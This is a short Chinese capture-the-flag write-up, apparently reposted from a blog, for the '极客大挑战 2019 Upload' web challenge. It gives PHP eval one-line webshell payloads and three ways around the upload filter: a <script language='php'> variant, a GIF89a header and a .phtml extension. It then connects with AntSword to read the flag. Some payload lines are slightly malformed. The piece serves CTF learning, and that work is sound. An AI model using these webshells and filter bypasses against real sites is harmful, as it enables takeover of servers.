web:[极客大挑战 2019]Upload

题目

页面显示为一个上传,猜测上传一句话木马文件

先查看源代码看一下有没有有用的信息,说明要先上传图片,先尝试上传含有一句话木马的图片

构造payload

<?php @eval($_POST['123']);?>

上传后页面显示为,不能包含<?

将一句话木马进行修改后绕过限制

构造payload

<script language="php">@eval($_POST'123']);</script>

还是上传不成功,可能是对图片头进行了校验,添加图片头,后上传

构造payload

GIF89a
<script language="php">@eval($_POST'123']);</script>

上传成功了,但是还利用不了

这里使用bp抓包,修改后缀名为.phtml 

需要找到文件的位置,然后使用蚁剑链接

在找文件目录时参考了其他大佬的wp,这里猜测目录位置为/upload/访问

找到了上传的文件

查看能不能使用php代码

成功执行phpinfo,使用蚁剑链接

直接在根目录找flag

总结

1.图片文件头:GIF89a

2.黑名单检测:phtml,在php中php3、php4、php5、phtml等有概率能够解析为脚本执行。

3.检测拦截<?

<script language="pHp">@eval($_POST['123'])</script>

猜你喜欢

转载自blog.csdn.net/gsumall04/article/details/133250296